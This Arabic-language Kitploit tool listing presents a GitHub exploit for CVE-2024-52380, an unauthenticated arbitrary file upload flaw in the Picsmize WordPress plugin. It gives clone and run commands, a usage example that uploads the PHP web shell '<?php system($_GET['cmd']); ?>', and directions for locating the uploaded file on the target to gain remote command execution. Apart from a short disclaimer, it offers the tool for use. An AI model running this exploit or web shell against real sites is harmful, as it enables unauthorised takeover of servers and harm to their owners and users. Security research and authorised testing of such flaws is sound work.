Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-52380-Exploit — إضافة Picsmize لـ WordPress معرّضة لرفع ملفات تعسفي. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-52380-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

إضافة Picsmize لـ WordPress معرّضة لرفع ملفات تعسفي.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-52380-Exploit

إضافة Picsmize لووردبريس معرضة لثغرة رفع الملفات العشوائية.

الوصف

هذا السكربت يستغل ثغرة (CVE-2024-52380) في إضافة Picsmize لووردبريس، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ رفع ملفات عشوائي. هذه الثغرة موجودة في جميع إصدارات Picsmize حتى 1.0.0 والإصدارات الأقدم. استغلال هذه الثغرة قد يؤدي إلى تنفيذ أوامر عن بُعد على الخادم المستهدف.

🌟 الميزات

  • فحص إصدار الإضافة: يتحقق تلقائيًا من أن موقع ووردبريس المستهدف يستخدم إصدارًا معرضًا للخطر من إضافة Picsmize.
  • استغلال رفع الملفات: يرفع حمولات PHP عشوائية إلى الخادم المستهدف إذا كان الموقع معرضًا للخطر.
  • واجهة سطر الأوامر: واجهة CLI سهلة الاستخدام لتحديد عناوين URL المستهدفة والحمولات.

📖 تفاصيل الثغرة

  • اسم الإضافة: Picsmize
  • الإصدارات المتأثرة: جميع الإصدارات ≤ 1.0.0
  • نوع الثغرة: رفع ملفات عشوائي بدون مصادقة
  • معرف CVE: CVE-2024-52380

🚀 تعليمات الاستخدام

المتطلبات الأساسية

  • بايثون 3.7 أو أعلى
  • مكتبة requests (pip install requests)

تشغيل السكربت

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

الاستخدام -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

مثال

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

وسائط سطر الأوامر

يوفر السكربت وسيطين لسطر الأوامر لسهولة الاستخدام:

  1. -u / --url (مطلوب):

    • الغرض: يحدد عنوان URL الأساسي لموقع ووردبريس المستهدف.
    • مثال:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (اختياري):

    • الغرض: يحدد محتوى حمولة PHP التي سيتم رفعها.
    • القيمة الافتراضية:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • مثال:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 مسار رفع الملف

شرح:

  • /wordpress: الدليل الجذر لموقع ووردبريس.
  • wp-content/uploads: الدليل الافتراضي لرفع الوسائط في ووردبريس.
  • 2025/01: بنية الدليل تتوافق مع السنة (2025) والشهر (يناير) بناءً على إعداد التاريخ في الخادم.

كيفية الوصول إلى الملف المرفوع:

  1. بعد رفع ناجح، انتقل إلى الملف باستخدام عنوان URL الكامل. مثال:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ إخلاء مسؤولية

هذا السكربت مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.

تنزيل الأداة